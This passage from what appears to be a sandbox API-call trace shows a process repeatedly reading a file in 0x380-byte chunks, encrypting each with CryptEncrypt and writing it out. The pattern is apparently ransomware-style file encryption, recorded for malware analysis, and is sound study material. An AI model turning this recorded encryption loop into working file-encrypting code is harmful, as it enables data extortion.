lpOverlapped=0x0) returned 1 [0266.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.835] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.835] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.835] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.836] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.836] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.836] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.836] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.836] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.837] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.837] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.837] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.837] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.837] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.837] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.837] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.837] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.838] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.838] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.838] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.838] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.839] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.839] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.839] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.839] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.839] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.839] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.839] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.839] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.839] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.840] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.840] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.840] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.840] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.841] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.841] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.841] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.841] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.841] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.841] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.841] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.841] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.841] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.842] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.842] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.842] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.842] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 